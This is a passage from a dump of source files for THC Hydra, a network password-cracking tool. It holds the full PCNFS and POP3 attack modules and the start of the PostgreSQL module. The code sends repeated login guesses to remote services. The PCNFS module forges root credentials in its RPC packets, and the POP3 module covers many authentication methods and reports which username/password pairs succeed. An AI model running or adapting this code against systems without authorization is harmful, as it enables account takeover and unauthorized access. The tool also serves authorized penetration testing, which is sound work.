here\n\n return 0;\n}\n" }, { "path": "hydra-pcnfs.c", "content": "#include \"hydra-mod.h\"\n\n/* pcnfs stuff copied from prout.c */\n\nextern char *HYDRA_EXIT;\nchar *buf;\n\n#define LEN_HDR_RPC 24\n#define LEN_AUTH_UNIX 72 + 12\n\n/* RPC common hdr */\nstruct rpc_hdr { /* 24 */\n unsigned long xid;\n unsigned long type_msg;\n unsigned long version_rpc;\n unsigned long prog_id;\n unsigned long prog_ver;\n unsigned long prog_proc;\n};\n\nstruct pr_auth_args {\n unsigned long len_clnt;\n char name[64];\n unsigned long len_id;\n char id[32];\n unsigned long len_passwd;\n char passwd[64];\n unsigned long len_comments;\n char comments[255];\n};\n\n#define LEN_HDR_PCN_AUTH sizeof(struct pr_auth_args)\n\n/* Lets start ... */\n\nint32_t start_pcnfs(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass, buffer[LEN_HDR_RPC + LEN_AUTH_UNIX + LEN_HDR_PCN_AUTH];\n char *ptr, *pkt = buffer;\n\n unsigned long *authp;\n struct timeval tv;\n\n struct rpc_hdr *rpch;\n struct pr_auth_args *prh;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n memset(pkt, 0, sizeof(buffer));\n\n rpch = (struct rpc_hdr *)(pkt);\n authp = (unsigned long *)(pkt + LEN_HDR_RPC);\n prh = (struct pr_auth_args *)(pkt + LEN_HDR_RPC + LEN_AUTH_UNIX);\n\n rpch->xid = htonl(0x32544843);\n rpch->type_msg = htonl(0);\n rpch->version_rpc = htonl(2);\n rpch->prog_id = htonl(150001);\n rpch->prog_ver = htonl(2);\n rpch->prog_proc = htonl(13); /* PCNFSD_PROC_PRAUTH */\n prh->len_clnt = htonl(63);\n prh->len_id = htonl(31);\n prh->len_passwd = htonl(63);\n prh->len_comments = htonl(254);\n\n strcpy(prh->comments, \" Hydra - THC password cracker - visit \"\n \"https://github.com/vanhauser-thc/thc-hydra - use only \"\n \"allowed for legal purposes \");\n strcpy(prh->name, \"localhost\");\n\n ptr = prh->id;\n while (*login) {\n *ptr++ = (*login ^ 0x5b) & 0x7f;\n login++;\n }\n *ptr = 0;\n ptr = prh->passwd;\n while (*pass) {\n *ptr++ = (*pass ^ 0x5b) & 0x7f;\n pass++;\n }\n *ptr = 0;\n\n gettimeofday(&tv, (struct timezone *)NULL);\n *(authp) = htonl(1); /* auth unix */\n *(++authp) = htonl(LEN_AUTH_UNIX - 16); /* length auth */\n *(++authp) = htonl(tv.tv_sec); /* local time */\n *(++authp) = htonl(9); /* length host */\n strcpy((char *)++authp, \"localhost\"); /* hostname */\n authp += (3); /* len(host)%4 */\n *(authp) = htonl(0); /* uid root */\n *(++authp) = htonl(0); /* gid root */\n *(++authp) = htonl(9); /* 9 gid grps */\n /* group root, bin, daemon, sys, adm, disk, wheel, floppy, \"user gid\" */\n *(++authp) = htonl(0);\n *(++authp) = htonl(1);\n *(++authp) = htonl(2);\n *(++authp) = htonl(3);\n *(++authp) = htonl(4);\n *(++authp) = htonl(6);\n *(++authp) = htonl(10);\n *(++authp) = htonl(11);\n *(++authp) = htonl(0);\n\n if (hydra_send(s, buffer, sizeof(buffer), 0) < 0) {\n fprintf(stderr, \"[ERROR] Could not send data to remote server, reconnecting ...\\n\");\n return 1;\n }\n\n if ((buf = hydra_receive_line(s)) == NULL) {\n fprintf(stderr, \"[ERROR] Timeout from remote server, reconnecting ...\\n\");\n return 1;\n }\n\n /* analyze the output */\n if (buf[2] != 'g' || buf[5] != 32) {\n fprintf(stderr, \"[ERROR] RPC answer status : bad proc/version/auth\\n\");\n free(buf);\n return 3;\n }\n\n if (buf[27] == 32 && buf[28] == 32 && buf[29] == 32) {\n hydra_report_found_host(port, ip, \"pcnfs\", fp);\n hydra_completed_pair_found();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n } else {\n hydra_completed_pair();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n }\n\n return 1;\n}\n\nvoid service_pcnfs(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n\n hydra_register_socket(sp);\n if (port == 0) {\n fprintf(stderr, \"[ERROR] pcnfs module called without -s port!\\n\");\n hydra_child_exit(0);\n }\n if ((options & OPTION_SSL) != 0) {\n fprintf(stderr, \"[ERROR] pcnfs module can not be used with SSL!\\n\");\n hydra_child_exit(0);\n }\n\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n\n while (1) {\n next_run = 0;\n switch (run) {\n case 1: /* connect and service init function */\n {\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(275);\n if ((sock = hydra_connect_udp(ip, port)) < 0) {\n if (quiet != 1)\n fprintf(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n next_run = 2;\n break;\n }\n case 2: /* run the cracking function */\n next_run = start_pcnfs(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n default:\n fprintf(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\nint32_t service_pcnfs_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n" }, { "path": "hydra-pop3.c", "content": "#include \"hydra-mod.h\"\n#include \"sasl.h\"\n\n// openssl s_client -starttls pop3 -crlf -connect 192.168.0.10:110\n\ntypedef struct pool_str {\n char ip[36];\n\n /* int32_t port;*/ // not needed\n int32_t pop3_auth_mechanism;\n int32_t disable_tls;\n struct pool_str *next;\n} pool;\n\nextern char *HYDRA_EXIT;\nchar *buf;\nchar apop_challenge[300] = \"\";\npool *plist = NULL, *p = NULL;\n\n/* functions */\nint32_t service_pop3_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname);\n\npool *list_create(pool data) {\n pool *p;\n\n if (!(p = malloc(sizeof(pool))))\n return NULL;\n\n memcpy(p->ip, data.ip, 36);\n // p->port = data.port;\n p->pop3_auth_mechanism = data.pop3_auth_mechanism;\n p->disable_tls = data.disable_tls;\n p->next = NULL;\n\n return p;\n}\n\npool *list_insert(pool data) {\n pool *newnode;\n\n newnode = list_create(data);\n newnode->next = plist;\n plist = newnode->next; // to be sure!\n\n return newnode;\n}\n\npool *list_find(char *ip) {\n pool *node = plist;\n\n while (node != NULL) {\n if (memcmp(node->ip, ip, 36) == 0)\n return node;\n node = node->next;\n }\n\n return NULL;\n}\n\n/* how to know when to release the mem ?\n -> well, after _start has determined which pool number it is */\nint32_t list_remove(pool *node) {\n pool *save, *list = plist;\n int32_t ok = -1;\n\n if (list == NULL || node == NULL)\n return -2;\n\n do {\n save = list->next;\n if (list != node)\n free(list);\n else\n ok = 0;\n list = save;\n } while (list != NULL);\n\n return ok;\n}\n\nchar *pop3_read_server_capacity(int32_t sock) {\n char *ptr = NULL;\n int32_t resp = 0;\n char *buf = NULL;\n\n do {\n if (buf != NULL)\n free(buf);\n ptr = buf = hydra_receive_line(sock);\n if (buf != NULL) {\n /*\n exchange capa:\n\n +OK\n UIDL\n STLS\n\n */\n if (strstr(buf, \"\\r\\n.\\r\\n\") != NULL && buf[0] == '+') {\n resp = 1;\n /* we got the capability info then get the completed warning info from\n * server */\n while (hydra_data_ready(sock)) {\n free(buf);\n buf = hydra_receive_line(sock);\n }\n } else {\n if (buf[strlen(buf) - 1] == '\\n')\n buf[strlen(buf) - 1] = 0;\n if (buf[strlen(buf) - 1] == '\\r')\n buf[strlen(buf) - 1] = 0;\n if (buf[strlen(buf) - 1] == '.' || *(ptr) == '.' || *(ptr) == '-')\n resp = 1;\n }\n }\n } while (buf != NULL && resp == 0);\n return buf;\n}\n\nint32_t start_pop3(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\\\"\\\"\", *result = NULL;\n char *login, *pass, buffer[500], buffer2[500], *fooptr;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n while (hydra_data_ready(s) > 0) {\n if ((buf = hydra_receive_line(s)) == NULL)\n return 4;\n free(buf);\n }\n\n switch (p->pop3_auth_mechanism) {\n#ifdef LIBOPENSSL\n case AUTH_APOP: {\n MD5_CTX c;\n unsigned char md5_raw[MD5_DIGEST_LENGTH];\n int32_t i;\n char *pbuffer = buffer2;\n\n MD5_Init(&c);\n MD5_Update(&c, apop_challenge, strlen(apop_challenge));\n MD5_Update(&c, pass, strlen(pass));\n MD5_Final(md5_raw, &c);\n\n for (i = 0; i < MD5_DIGEST_LENGTH; i++) {\n sprintf(pbuffer, \"%02x\", md5_raw[i]);\n pbuffer += 2;\n }\n sprintf(buffer, \"APOP %s %s\\r\\n\", login, buffer2);\n } break;\n#endif\n\n case AUTH_LOGIN: {\n sprintf(buffer, \"AUTH LOGIN\\r\\n\");\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return 4;\n if (buf[0] != '+') {\n hydra_report(stderr, \"[ERROR] POP3 LOGIN AUTH : %s\\n\", buf);\n free(buf);\n return 3;\n }\n free(buf);\n strcpy(buffer2, login);\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n\n sprintf(buffer, \"%.250s\\r\\n\", buffer2);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return 4;\n\n if (buf[0] != '+') {\n hydra_report(stderr, \"[ERROR] POP3 LOGIN AUTH : %s\\n\", buf);\n free(buf);\n return 3;\n }\n free(buf);\n strcpy(buffer2, pass);\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n sprintf(buffer, \"%.250s\\r\\n\", buffer2);\n } break;\n\n case AUTH_PLAIN: {\n sprintf(buffer, \"AUTH PLAIN\\r\\n\");\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return 4;\n if (buf[0] != '+') {\n hydra_report(stderr, \"[ERROR] POP3 PLAIN AUTH : %s\\n\", buf);\n free(buf);\n return 3;\n }\n free(buf);\n\n memset(buffer, 0, sizeof(buffer));\n result = sasl_plain(buffer, login, pass);\n if (result == NULL)\n return 3;\n\n char tmp_buffer[sizeof(buffer)];\n sprintf(tmp_buffer, \"%.250s\\r\\n\", buffer);\n strcpy(buffer, tmp_buffer);\n } break;\n\n#ifdef LIBOPENSSL\n case AUTH_CRAMMD5:\n case AUTH_CRAMSHA1:\n case AUTH_CRAMSHA256: {\n int32_t rc = 0;\n char *preplogin;\n\n rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin);\n if (rc) {\n return 3;\n }\n\n switch (p->pop3_auth_mechanism) {\n case AUTH_CRAMMD5:\n sprintf(buffer, \"AUTH CRAM-MD5\\r\\n\");\n break;\n case AUTH_CRAMSHA1:\n sprintf(buffer, \"AUTH CRAM-SHA1\\r\\n\");\n break;\n case AUTH_CRAMSHA256:\n sprintf(buffer, \"AUTH CRAM-SHA256\\r\\n\");\n break;\n }\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n // get the one-time BASE64 encoded challenge\n\n if ((buf = hydra_receive_line(s)) == NULL)\n return 4;\n if (buf[0] != '+') {\n switch (p->pop3_auth_mechanism) {\n case AUTH_CRAMMD5:\n hydra_report(stderr, \"[ERROR] POP3 CRAM-MD5 AUTH : %s\\n\", buf);\n break;\n case AUTH_CRAMSHA1:\n hydra_report(stderr, \"[ERROR] POP3 CRAM-SHA1 AUTH : %s\\n\", buf);\n break;\n case AUTH_CRAMSHA256:\n hydra_report(stderr, \"[ERROR] POP3 CRAM-SHA256 AUTH : %s\\n\", buf);\n break;\n }\n free(buf);\n return 3;\n }\n\n memset(buffer, 0, sizeof(buffer));\n from64tobits((char *)buffer, buf + 2);\n free(buf);\n\n memset(buffer2, 0, sizeof(buffer2));\n\n switch (p->pop3_auth_mechanism) {\n case AUTH_CRAMMD5: {\n result = sasl_cram_md5(buffer2, pass, buffer);\n if (result == NULL)\n return 3;\n sprintf(buffer, \"%s %.250s\", preplogin, buffer2);\n } break;\n case AUTH_CRAMSHA1: {\n result = sasl_cram_sha1(buffer2, pass, buffer);\n if (result == NULL)\n return 3;\n sprintf(buffer, \"%s %.250s\", preplogin, buffer2);\n } break;\n case AUTH_CRAMSHA256: {\n result = sasl_cram_sha256(buffer2, pass, buffer);\n if (result == NULL)\n return 3;\n sprintf(buffer, \"%s %.250s\", preplogin, buffer2);\n } break;\n }\n hydra_tobase64((unsigned char *)buffer, strlen(buffer), sizeof(buffer));\n\n char tmp_buffer[sizeof(buffer)];\n sprintf(tmp_buffer, \"%.250s\\r\\n\", buffer);\n strcpy(buffer, tmp_buffer);\n free(preplogin);\n } break;\n\n case AUTH_DIGESTMD5: {\n sprintf(buffer, \"AUTH DIGEST-MD5\\r\\n\");\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0)\n return 1;\n // receive\n if ((buf = hydra_receive_line(s)) == NULL)\n return 4;\n if (buf[0] != '+') {\n hydra_report(stderr, \"[ERROR] POP3 DIGEST-MD5 AUTH : %s\\n\", buf);\n free(buf);\n return 3;\n }\n memset(buffer, 0, sizeof(buffer));\n from64tobits((char *)buffer, buf);\n free(buf);\n\n if (debug)\n hydra_report(stderr, \"[DEBUG] S: %s\\n\", buffer);\n\n fooptr = buffer2;\n result = sasl_digest_md5(fooptr, login, pass, buffer, miscptr, \"pop\", NULL, 0, NULL);\n if (result == NULL)\n return 3;\n\n if (debug)\n hydra_report(stderr, \"[DEBUG] C: %s\\n\", buffer2);\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n sprintf(buffer, \"%s\\r\\n\", buffer2);\n } break;\n#endif\n\n case AUTH_NTLM: {\n unsigned char buf1[4096];\n unsigned char buf2[4096];\n\n // Send auth request\n sprintf(buffer, \"AUTH NTLM\\r\\n\");\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0)\n return 1;\n // receive\n if ((buf = hydra_receive_line(s)) == NULL)\n return 4;\n if (buf[0] != '+') {\n hydra_report(stderr, \"[ERROR] POP3 NTLM AUTH : %s\\n\", buf);\n free(buf);\n return 3;\n }\n free(buf);\n // send auth and receive challenge\n // send auth request: lst the server send it's own hostname and domainname\n buildAuthRequest((tSmbNtlmAuthRequest *)buf2, 0, NULL, NULL);\n to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *)buf2));\n\n sprintf(buffer, \"%s\\r\\n\", buf1);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0)\n return 1;\n if ((buf = hydra_receive_line(s)) == NULL || strlen(buf) < 6)\n return 4;\n\n // recover challenge\n from64tobits((char *)buf1, buf + 2);\n free(buf);\n\n // Send response\n buildAuthResponse((tSmbNtlmAuthChallenge *)buf1, (tSmbNtlmAuthResponse *)buf2, 0, login, pass, NULL, NULL);\n to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *)buf2));\n\n sprintf(buffer, \"%s\\r\\n\", buf1);\n } break;\n default:\n sprintf(buffer, \"USER %.250s\\r\\n\", login);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return 4;\n if (buf[0] != '+') {\n hydra_report(stderr, \"[ERROR] POP3 protocol or service shutdown: %s\\n\", buf);\n free(buf);\n return (3);\n }\n free(buf);\n sprintf(buffer, \"PASS %.250s\\r\\n\", pass);\n }\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n\n if ((buf = hydra_receive_line(s)) == NULL) {\n return 4;\n }\n\n if (buf[0] == '+') {\n hydra_report_found_host(port, ip, \"pop3\", fp);\n hydra_completed_pair_found();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n }\n /* special AS/400 hack */\n if (strstr(buf, \"CPF2204\") != NULL || strstr(buf, \"CPF22E3\") != NULL || strstr(buf, \"CPF22E4\") != NULL || strstr(buf, \"CPF22E5\") != NULL) {\n if (verbose)\n printf(\"[INFO] user %s does not exist, skipping\\n\", login);\n hydra_completed_pair_skip();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n }\n free(buf);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n\n return 2;\n}\n\nvoid service_pop3(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n char *ptr = NULL;\n\n // extract data from the pool, ip is the key\n if (plist == NULL)\n if (service_pop3_init(ip, sp, options, miscptr, fp, port, hostname) != 0)\n hydra_child_exit(2);\n p = list_find(ip);\n if (p == NULL) {\n hydra_report(stderr, \"[ERROR] Could not find ip %s in pool\\n\", hydra_address2string(ip));\n return;\n }\n if (list_remove(p) != 0)\n hydra_report(stderr, \"[ERROR] Could not find ip %s in pool to free memory\\n\", hydra_address2string(ip));\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(300);\n if ((options & OPTION_SSL) == 0) {\n sock = hydra_connect_tcp(ip, port);\n } else {\n sock = hydra_connect_ssl(ip, port, hostname);\n }\n if (sock < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n buf = hydra_receive_line(sock);\n if (buf == NULL || buf[0] != '+') { /* check the first line */\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Not an POP3 protocol or service shutdown: %s\\n\", buf);\n hydra_child_exit(2);\n }\n\n ptr = strstr(buf, \"<\");\n if (ptr != NULL && buf[0] == '+') {\n if (ptr[strlen(ptr) - 1] == '\\n')\n ptr[strlen(ptr) - 1] = 0;\n if (ptr[strlen(ptr) - 1] == '\\r')\n ptr[strlen(ptr) - 1] = 0;\n strcpy(apop_challenge, ptr);\n }\n free(buf);\n\n#ifdef LIBOPENSSL\n if (!p->disable_tls) {\n /* check for STARTTLS, if available we may have access to more basic\n * auth methods */\n hydra_send(sock, \"STLS\\r\\n\", strlen(\"STLS\\r\\n\"), 0);\n buf = hydra_receive_line(sock);\n if (buf[0] != '+') {\n hydra_report(stderr, \"[ERROR] TLS negotiation failed, no answer \"\n \"received from STARTTLS request\\n\");\n } else {\n free(buf);\n if ((hydra_connect_to_ssl(sock, hostname) == -1)) {\n if (verbose)\n hydra_report(stderr, \"[ERROR] Can't use TLS\\n\");\n p->disable_tls = 1;\n } else {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] TLS connection done\\n\");\n }\n }\n }\n#endif\n\n next_run = 2;\n break;\n case 2: /* run the cracking function */\n next_run = start_pop3(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n case 4: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(2);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\nint32_t service_pop3_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t myport = PORT_POP3, mysslport = PORT_POP3_SSL;\n char *ptr = NULL;\n int32_t sock = -1;\n char *capa_str = \"CAPA\\r\\n\";\n char *quit_str = \"QUIT\\r\\n\";\n pool p;\n\n p.pop3_auth_mechanism = AUTH_CLEAR;\n p.disable_tls = 1;\n p.next = NULL;\n memcpy(p.ip, ip, 36);\n\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(p.ip, myport);\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(p.ip, mysslport, hostname);\n }\n if (sock < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] pid %d terminating, can not connect\\n\", (int32_t)getpid());\n return -1;\n }\n buf = hydra_receive_line(sock);\n if (buf == NULL || buf[0] != '+') { /* check the first line */\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Not an POP3 protocol or service shutdown: %s\\n\", buf);\n return -1;\n }\n\n ptr = strstr(buf, \"<\");\n if (ptr != NULL && buf[0] == '+') {\n if (ptr[strlen(ptr) - 1] == '\\n')\n ptr[strlen(ptr) - 1] = 0;\n if (ptr[strlen(ptr) - 1] == '\\r')\n ptr[strlen(ptr) - 1] = 0;\n strcpy(apop_challenge, ptr);\n }\n free(buf);\n\n /* send capability request */\n if (hydra_send(sock, capa_str, strlen(capa_str), 0) < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Can not send the CAPABILITY request\\n\");\n return -1;\n }\n\n buf = pop3_read_server_capacity(sock);\n\n if (buf == NULL) {\n hydra_report(stderr, \"[ERROR] No answer from CAPABILITY request\\n\");\n return -1;\n }\n\n if ((miscptr != NULL) && (strlen(miscptr) > 0)) {\n int32_t i;\n\n for (i = 0; i < strlen(miscptr); i++)\n miscptr[i] = (char)toupper((int32_t)miscptr[i]);\n\n if (strstr(miscptr, \"TLS\") || strstr(miscptr, \"SSL\") || strstr(miscptr, \"STARTTLS\")) {\n p.disable_tls = 0;\n }\n }\n\n#ifdef LIBOPENSSL\n if (!p.disable_tls) {\n /* check for STARTTLS, if available we may have access to more basic auth\n * methods */\n if (strstr(buf, \"STLS\") != NULL) {\n hydra_send(sock, \"STLS\\r\\n\", strlen(\"STLS\\r\\n\"), 0);\n free(buf);\n buf = hydra_receive_line(sock);\n if (buf[0] != '+') {\n hydra_report(stderr, \"[ERROR] TLS negotiation failed, no answer \"\n \"received from STARTTLS request\\n\");\n } else {\n free(buf);\n if ((hydra_connect_to_ssl(sock, hostname) == -1)) {\n if (verbose)\n hydra_report(stderr, \"[ERROR] Can't use TLS\\n\");\n p.disable_tls = 1;\n } else {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] TLS connection done\\n\");\n }\n if (!p.disable_tls) {\n /* ask again capability request but in TLS mode */\n if (hydra_send(sock, capa_str, strlen(capa_str), 0) < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Can not send the CAPABILITY request\\n\");\n return -1;\n }\n buf = pop3_read_server_capacity(sock);\n if (buf == NULL) {\n hydra_report(stderr, \"[ERROR] No answer from CAPABILITY request\\n\");\n return -1;\n }\n }\n }\n } else\n hydra_report(stderr, \"[ERROR] option to use TLS/SSL failed as it is not \"\n \"supported by the server\\n\");\n }\n#endif\n\n if (hydra_send(sock, quit_str, strlen(quit_str), 0) < 0) {\n // we don't care if the server is not receiving the quit msg\n }\n hydra_disconnect(sock);\n\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] CAPABILITY: %s\", buf);\n\n /* example:\n +OK Capability list follows:\n TOP\n LOGIN-DELAY 180\n UIDL\n USER\n SASL PLAIN LOGIN\n */\n\n /* according to rfc 2449:\n The POP3 AUTH command [POP-AUTH] permits the use of [SASL]\n authentication mechanisms with POP3. The SASL capability\n indicates that the AUTH command is available and that it supports\n an optional base64 encoded second argument for an initial client\n response as described in the SASL specification. The argument to\n the SASL capability is a space separated list of SASL mechanisms\n which are supported.\n */\n\n /* which mean threre will *always* have a space before the LOGIN auth keyword\n */\n if ((strstr(buf, \" LOGIN\") == NULL) && (strstr(buf, \"NTLM\") != NULL)) {\n p.pop3_auth_mechanism = AUTH_NTLM;\n }\n#ifdef LIBOPENSSL\n if ((strstr(buf, \" LOGIN\") == NULL) && (strstr(buf, \"DIGEST-MD5\") != NULL)) {\n p.pop3_auth_mechanism = AUTH_DIGESTMD5;\n }\n\n if ((strstr(buf, \" LOGIN\") == NULL) && (strstr(buf, \"CRAM-SHA256\") != NULL)) {\n p.pop3_auth_mechanism = AUTH_CRAMSHA256;\n }\n\n if ((strstr(buf, \" LOGIN\") == NULL) && (strstr(buf, \"CRAM-SHA1\") != NULL)) {\n p.pop3_auth_mechanism = AUTH_CRAMSHA1;\n }\n\n if ((strstr(buf, \" LOGIN\") == NULL) && (strstr(buf, \"CRAM-MD5\") != NULL)) {\n p.pop3_auth_mechanism = AUTH_CRAMMD5;\n }\n#endif\n\n if ((strstr(buf, \" LOGIN\") == NULL) && (strstr(buf, \"PLAIN\") != NULL)) {\n p.pop3_auth_mechanism = AUTH_PLAIN;\n }\n\n if (strstr(buf, \" LOGIN\") != NULL) {\n p.pop3_auth_mechanism = AUTH_LOGIN;\n }\n\n if (strstr(buf, \"SASL\") == NULL) {\n#ifdef LIBOPENSSL\n if (strlen(apop_challenge) == 0) {\n p.pop3_auth_mechanism = AUTH_CLEAR;\n } else {\n p.pop3_auth_mechanism = AUTH_APOP;\n }\n#else\n p.pop3_auth_mechanism = AUTH_CLEAR;\n#endif\n }\n free(buf);\n\n if ((miscptr != NULL) && (strlen(miscptr) > 0)) {\n if (strstr(miscptr, \"CLEAR\"))\n p.pop3_auth_mechanism = AUTH_CLEAR;\n\n if (strstr(miscptr, \"LOGIN\"))\n p.pop3_auth_mechanism = AUTH_LOGIN;\n\n if (strstr(miscptr, \"PLAIN\"))\n p.pop3_auth_mechanism = AUTH_PLAIN;\n\n#ifdef LIBOPENSSL\n if (strstr(miscptr, \"APOP\"))\n p.pop3_auth_mechanism = AUTH_APOP;\n\n if (strstr(miscptr, \"CRAM-MD5\"))\n p.pop3_auth_mechanism = AUTH_CRAMMD5;\n\n if (strstr(miscptr, \"CRAM-SHA1\"))\n p.pop3_auth_mechanism = AUTH_CRAMSHA1;\n\n if (strstr(miscptr, \"CRAM-SHA256\"))\n p.pop3_auth_mechanism = AUTH_CRAMSHA256;\n\n if (strstr(miscptr, \"DIGEST-MD5\"))\n p.pop3_auth_mechanism = AUTH_DIGESTMD5;\n#endif\n\n if (strstr(miscptr, \"NTLM\"))\n p.pop3_auth_mechanism = AUTH_NTLM;\n }\n\n if (verbose) {\n switch (p.pop3_auth_mechanism) {\n case AUTH_CLEAR:\n hydra_report(stderr, \"[VERBOSE] using POP3 CLEAR LOGIN mechanism\\n\");\n break;\n case AUTH_LOGIN:\n hydra_report(stderr, \"[VERBOSE] using POP3 LOGIN AUTH mechanism\\n\");\n break;\n case AUTH_PLAIN:\n hydra_report(stderr, \"[VERBOSE] using POP3 PLAIN AUTH mechanism\\n\");\n break;\n case AUTH_APOP:\n#ifdef LIBOPENSSL\n if (strlen(apop_challenge) == 0) {\n hydra_report(stderr, \"[VERBOSE] APOP not supported by server, using clear login\\n\");\n p.pop3_auth_mechanism = AUTH_CLEAR;\n } else {\n hydra_report(stderr, \"[VERBOSE] using POP3 APOP AUTH mechanism\\n\");\n }\n#else\n p.pop3_auth_mechanism = AUTH_CLEAR;\n#endif\n break;\n#ifdef LIBOPENSSL\n case AUTH_CRAMMD5:\n hydra_report(stderr, \"[VERBOSE] using POP3 CRAM-MD5 AUTH mechanism\\n\");\n break;\n case AUTH_CRAMSHA1:\n hydra_report(stderr, \"[VERBOSE] using POP3 CRAM-SHA1 AUTH mechanism\\n\");\n break;\n case AUTH_CRAMSHA256:\n hydra_report(stderr, \"[VERBOSE] using POP3 CRAM-SHA256 AUTH mechanism\\n\");\n break;\n case AUTH_DIGESTMD5:\n hydra_report(stderr, \"[VERBOSE] using POP3 DIGEST-MD5 AUTH mechanism\\n\");\n break;\n#endif\n case AUTH_NTLM:\n hydra_report(stderr, \"[VERBOSE] using POP3 NTLM AUTH mechanism\\n\");\n break;\n }\n }\n\n if (!plist)\n plist = list_create(p);\n else\n plist = list_insert(p);\n\n return 0;\n}\n\nvoid usage_pop3(const char *service) {\n printf(\"Module pop3 is optionally taking one authentication type of:\\n\"\n \" CLEAR (default), LOGIN, PLAIN, CRAM-MD5, CRAM-SHA1,\\n\"\n \" CRAM-SHA256, DIGEST-MD5, NTLM.\\n\"\n \"Additionally TLS encryption via STLS can be enforced with the TLS \"\n \"option.\\n\\n\"\n \"Example: pop3://target/TLS:PLAIN\\n\");\n}\n" }, { "path": "hydra-postgres.c", "content": "/*\n *\tPostgresSQL Support - by Diaul (at) devilopers.org\n *\n *\n * 110425 no obvious memleaks found\n */\n\n#include \"hydra-mod.h\"\n\n#ifndef LIBPOSTGRES\nvoid dummy_postgres() { printf(\"\\n\"); }\n#else\n\n#include \"libpq-fe.h\" // Postgres connection functions\n#include \n\n#define DEFAULT_DB \"template1\"\n\nextern hydra_option hydra_options;\nextern char 